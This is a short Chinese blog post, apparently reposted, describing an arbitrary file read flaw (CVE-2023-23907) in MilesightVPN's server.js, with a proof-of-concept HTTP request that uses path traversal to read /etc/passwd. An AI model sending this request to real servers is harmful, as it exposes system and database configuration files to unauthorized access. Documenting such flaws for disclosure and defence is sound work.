博客
关于我
Milesight VPN server.js 任意文件读取漏洞(CVE-2023-23907)
阅读量:795 次
发布时间:2023-02-09

本文共 540 字,大约阅读时间需要 1 分钟。

MilesightVPN服务器文件读取漏洞分析

MilesightVPN是一款专为Milesight产品设计的VPN通道设置软件,其服务器接口在此次发现的安全漏洞中表现尤为突出。该漏洞使得攻击者能够通过特定的接口操作,读取系统关键文件和数据库配置信息,严重威胁网站的安全性。

该漏洞复现环境如下:

GET /../../../../../../../../../etc/passwd HTTP/1.1

Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/x-www-form-ur

该漏洞的POC(Proof of Concept,漏洞证据)表明,攻击者可以通过简单的GET请求访问系统核心文件,进一步导致服务器安全性全面受损。

经测试,该漏洞在MilesightVPN server.js的接口中存在,具体表现为攻击者可通过该接口读取包括数据库配置文件和系统配置文件在内的重要系统文件。

转载地址:http://tzffk.baihongyu.com/

你可能感兴趣的文章
mac mysql 进程_Mac平台下启动MySQL到完全终止MySQL----终端八步走
查看>>
Mac OS 12.0.1 如何安装柯美287打印机驱动,刷卡打印
查看>>
Mac OS X 上 Python 的框架和非框架构建之间的差异
查看>>
Mac OS X下Sublime Text (V2.0.1)破解
查看>>
Mac OS X汇编语言常识
查看>>
Mac OS下错误The superclass “javax.servlet.http.HttpServlet“ was not found on the Java Build Path的解决方法
查看>>
MAC 上的 Selenium,消息:“chromedriver“可执行文件可能具有错误的权限
查看>>
Mac 下 Python+Selenium 自动上传西瓜视频
查看>>
mac 下 react Native ios环境搭建
查看>>
Mac 下使用sourcetree操作git教程
查看>>
Mac 也需要杀毒?我亲测三款顶级杀毒软件,保护你的数据安全!从零基础到精通,收藏这篇就够了!
查看>>
mac 安装PIL
查看>>
mac 搭建APK反编译环境[转]
查看>>
MAC 显示隐藏文件
查看>>
Mac 的“任务管理器” —— 活动监视器
查看>>
mac 虚拟机安装oracle 11g,MAC+Vmware Fusion安装Oracle11g RAC
查看>>
mac-gradle的安装和配置
查看>>
Mac:Permission denied XXX
查看>>
macaca 测试web(2)
查看>>
Macbook / pro卡顿怎么处理?这些方法让它满血复活!
查看>>